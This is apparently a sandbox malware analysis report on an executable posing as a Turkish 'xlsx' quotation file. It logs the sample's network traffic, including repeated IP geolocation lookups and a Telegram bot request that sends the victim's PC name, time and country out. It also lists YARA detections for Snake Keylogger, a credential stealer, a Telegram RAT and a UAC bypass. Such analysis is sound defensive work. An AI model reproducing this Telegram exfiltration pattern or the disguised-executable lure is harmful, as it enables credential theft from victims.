cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1522&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1918528&cwnd=146&unsent_bytes=0&cid=481f96741f9dd507&ts=460&x=0"
2024-12-13 16:47:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49721	104.21.67.152	443	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:47:47 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:47:48 UTC	875	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97236 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zlg%2B0ww52yHJdnTJIzCZjKxtCwjaPfYowXfm7Whg0HheK0xokLru93yyKl6STekaPRCl6NaF9CXbc0HM8RUz4QlYpMBfeP6Z0gbcBD2%2BqHB5u9R0DzoGv85X%2FpZHAZjBPrsTJ4EW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1770242a89420b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2038&min_rtt=2029&rtt_var=779&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1387832&cwnd=123&unsent_bytes=0&cid=521a718afcccda9c&ts=456&x=0"
2024-12-13 16:47:48 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49723	104.21.67.152	443	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:47:50 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:47:51 UTC	873	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:51 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97240 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lRxfavlOzYuQtzle%2Fek3K4LcMgxl2UAGpKlXZpPdUossKHukuO1w19qp44WWOuBt2LouRWrFS8%2FU44oHZxlkevSYjRPby2GYcaGayHmZVfeCfzSHSa1eCPWWyfXuF7UhO90luaj2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f17703879074399-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1603&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1736028&cwnd=222&unsent_bytes=0&cid=f4eeb95622a5e9af&ts=457&x=0"
2024-12-13 16:47:51 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49725	104.21.67.152	443	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:47:54 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:47:54 UTC	877	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:54 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97243 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q0oIVpfjydjyUuXoqhY1fpc3imKlaaGyotIr9V0vZVLxFNQ03GVwRC209Sw8LlSvJJ0%2B6E%2FO4xIFMwVABooJTtuZwORXNQz6oP6ZAjtD9Vh6qyXL6KXokSZT7%2BregIf5aUnpne0q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f17704cdbd84239-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10041&min_rtt=1669&rtt_var=5741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1749550&cwnd=229&unsent_bytes=0&cid=80ac620716b940b7&ts=455&x=0"
2024-12-13 16:47:54 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49727	104.21.67.152	443	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:47:57 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-13 16:47:57 UTC	875	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:57 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97246 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GyXY%2F7J%2B92QsXMljESE8A3tYCmkojr1QVXm3yLmiPJgoiOWIc1VdYwKCwZvzCfY2Gw93Hsvakl0KN4mU3NPiSRAN21soMCpfX7kcT6u3yp%2B24EMr0QOn2LZl5KUFyNS4R1WmrgBP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177061098c4322-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1581&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1779402&cwnd=221&unsent_bytes=0&cid=6d3017f53d96a685&ts=457&x=0"
2024-12-13 16:47:57 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49728	149.154.167.220	443	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:47:59 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2014/12/2024%20/%2016:26:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-13 16:47:59 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 13 Dec 2024 16:47:59 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-13 16:47:59 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Analysis Process: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exePID: 6740, Parent PID: 4084

General

Target ID:	0
Start time:	11:47:25
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Imagebase:	0x2a1fab40000
File size:	638'976 bytes
MD5 hash:	037B9DC9D5BEE07E111173CBE87624B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:47:26
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:47:27
Start date:	13/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Imagebase:	0xcd0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4019025145.0000000003139000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	11:47:27
Start date:	13/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Imagebase:
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	11:47:27
Start date:	13/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6740 -s 1028
Imagebase:	0x7ff62db10000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exePID: 6740, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	8
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFB4AD8E089 Relevance: 4.2, Strings: 2, Instructions: 1651COMMON

Download Yara Rule

Strings

)J, xrefs: 00007FFB4AD8E209
)J, xrefs: 00007FFB4AD8E1E8

Memory Dump Source

Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: )J$)J
API String ID: 0-3559553940
Opcode ID: 57c50d94d99db58339e9e93c361c72e5f582612398c949c2f94875063b4a4a09
Instruction ID: c7b5b8868f69387685b693f356beb09551e71bd92c3f22f15d0b46b4e4e52315
Opcode Fuzzy Hash: 57c50d94d99db58339e9e93c361c72e5f582612398c949c2f94875063b4a4a09
Instruction Fuzzy Hash: B6B2227060CB854FD759EF28C4814B5B7E2FF95301B2446BEE49AC7296DE38E846CB81

Function 00007FFB4AD88B78 Relevance: 4.0, Strings: 2, Instructions: 1451COMMON

Download Yara Rule

Strings

XBJ, xrefs: 00007FFB4AD90C4F
XBJ, xrefs: 00007FFB4AD90B0F

Memory Dump Source

Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: XBJ$XBJ
API String ID: 0-881064399
Opcode ID: 50eec0c1c0a9bbf59fa24b882889a9a6903642ece109d531343b4f78884e922a
Instruction ID: d8eedd9db06bac46c76c0a55b12570413cc970c584e3a2a188f6f0bafddb0c31
Opcode Fuzzy Hash: 50eec0c1c0a9bbf59fa24b882889a9a6903642ece109d531343b4f78884e922a
Instruction Fuzzy Hash: 1AA292B1A0DA498FEB98EF28D495AB877F5FF55310F2401F9D04EC7292DA28AC41CB41

Function 00007FFB4AD82630 Relevance: 3.2, Strings: 2, Instructions: 740
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HoJ, xrefs: 00007FFB4AD8467E
d, xrefs: 00007FFB4AD843BF

Memory Dump Source

Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: HoJ$d
API String ID: 0-3187922457
Opcode ID: f77b93de92609eacdfea9649446e2ed6c513120d7a518a74d9489a29234a5324
Instruction ID: 3feb758f29d5a2ea3cada3077ddcab723f2bd3703dee8c556789256fa92ba261
Opcode Fuzzy Hash: f77b93de92609eacdfea9649446e2ed6c513120d7a518a74d9489a29234a5324
Instruction Fuzzy Hash: 2E2234B1A1DA494FEB59EE3CD4825B1B7E4EF55310B2402FED4AAC7197DD28E8438780

Function 00007FFB4AE503E3 Relevance: 3.0, Strings: 1, Instructions: 1736COMMON

Download Yara Rule

Strings

A, xrefs: 00007FFB4AE50786

Memory Dump Source

Source File: 00000000.00000002.1673716540.00007FFB4AE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ae50000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: 1585787b537c4a10568b28b18431536d9dc449a7492188b92ed1f555f22279ca
Instruction ID: 34cd58785ff0344cfa27e1b0d053722951a9c7683decdb4077f28627ee850f4c
Opcode Fuzzy Hash: 1585787b537c4a10568b28b18431536d9dc449a7492188b92ed1f555f22279ca
Instruction Fuzzy Hash: 2BB244B280D6864FE756FFB8D9555A47FE0FF55300F2801FEE099CB196DA28A806C781

Function 00007FFB4AD83C60 Relevance: 3.0, Strings: 2, Instructions: 470
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fish, xrefs: 00007FFB4AD83CC0
hKJ, xrefs: 00007FFB4AD83D84

Memory Dump Source

Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: fish$hKJ
API String ID: 0-1128198123
Opcode ID: d2b06780895377ce22c546902d515e10d5bbe8249ce5eb6004e35261037b1ca7
Instruction ID: 3ee92fc8730a00f663face0ecef10a557ee4cfdcfe3446bbe504040704a68802
Opcode Fuzzy Hash: d2b06780895377ce22c546902d515e10d5bbe8249ce5eb6004e35261037b1ca7
Instruction Fuzzy Hash: 53D1277171DA4A4FEB5DBE3CD8555F5B3E0EF96210B1442BEE49FC3292DD28A8028781

Function 00007FFB4AD8B501 Relevance: 2.8, Strings: 1, Instructions: 1546COMMON

Download Yara Rule

Strings

`}J, xrefs: 00007FFB4AD8BFCF

Memory Dump Source

Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: `}J
API String ID: 0-1057495743
Opcode ID: c8b146285a7f4814215989bd789fe331a7bcfaa472a7570e69ab44e77d42568d
Instruction ID: 497d1b766afcd3cb133dc770384bae81b182af8f68372a9f986b07479fcb8e58
Opcode Fuzzy Hash: c8b146285a7f4814215989bd789fe331a7bcfaa472a7570e69ab44e77d42568d
Instruction Fuzzy Hash: 5BB24A7061CB868FE709EF38C4955A5BBE1FF95300B2445FED49AC72A6DA38A846C740

Function 00007FFB4AD9407A Relevance: 2.7, Strings: 2, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

J, xrefs: 00007FFB4AD94085
J, xrefs: 00007FFB4AD940CA

Memory Dump Source

Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: J$J
API String ID: 0-806982098
Opcode ID: da882ebf11de7ebaaf1e2483197735776f1879dedfbb662387422c636f76d563
Instruction ID: f177ea8b88f19f6e7aca8ab74a6446e44dad7373f63873795b0ea0cd4e2d0c3e
Opcode Fuzzy Hash: da882ebf11de7ebaaf1e2483197735776f1879dedfbb662387422c636f76d563
Instruction Fuzzy Hash: F2516C71A0D7890FD71E9E38C8521B57BE9DB86320F1582BFD48AC72D7DD28A8478391

Function 00007FFB4AD864A0 Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

J, xrefs: 00007FFB4AD93977

Memory Dump Source

Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: J
API String ID: 0-2383599987
Opcode ID: cf3403a02c475e9a772ac680dc74642d9e9ac225533e0ea391f092d88488ddb9
Instruction ID: 3df19221e7e7f4554f4ca6c4610fccadeb72e9380ebcc2f6c5960bbd47bd27c2
Opcode Fuzzy Hash: cf3403a02c475e9a772ac680dc74642d9e9ac225533e0ea391f092d88488ddb9
Instruction Fuzzy Hash: 18513B62B0D6950FD31EAE7C9C951E17FA9DB8B31071982FFD486CB2E7D8259C068381

Function 00007FFB4AD88B70 Relevance: .9, Instructions: 924COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0d4b73d1144d74dc9c179f99b61233d19bb02c5efeecd3b3581f5c48fc8bbc
Instruction ID: bf6e94a3c08c835c20e87290151e17b27381b236c63b80b855018f2388f0d6c2
Opcode Fuzzy Hash: 5f0d4b73d1144d74dc9c179f99b61233d19bb02c5efeecd3b3581f5c48fc8bbc
